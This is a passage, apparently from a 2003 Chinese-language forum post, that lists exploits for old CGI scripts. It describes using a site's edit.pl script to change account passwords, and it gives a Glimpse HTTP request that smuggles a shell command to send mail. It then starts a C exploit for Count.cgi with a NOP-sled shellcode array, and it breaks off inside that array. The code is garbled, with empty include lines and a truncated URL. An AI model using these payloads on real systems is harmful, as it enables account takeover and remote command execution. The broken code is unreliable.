|
CGI漏洞(7) submission) you could change the password on all of their accounts
with a simple JavaScript function. Deep inside the web site authors still have the good old "edit.pl"
script. It takes some time to reach it (unlike the path described)
but you can reach it directly at:  http://www.sitetracker.com/cgi-bin/edit.pl...ount=&password= ;
(发帖时间:2003:9:15 07:22:27)
---玟ζ玟
(2): 二十一.Vulnerability in Glimpse HTTP telnet target.machine.com 80
GET /cgi-bin/aglimpse/80IFS=5;CMD=5mail5fyodor\@dhp.com\ HTTP/1.0
二十二.Count.cgi
该程序只对Count.cgi 24以下版本有效:
/*### count.c ########################################################*/
#include
#include
#include
#include
#include
#include
#include
#include
#include /* Forwards */
unsigned long getsp(int);
int usage(char *);
void doit(char *,long, char *); /* Constants */
char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
| 
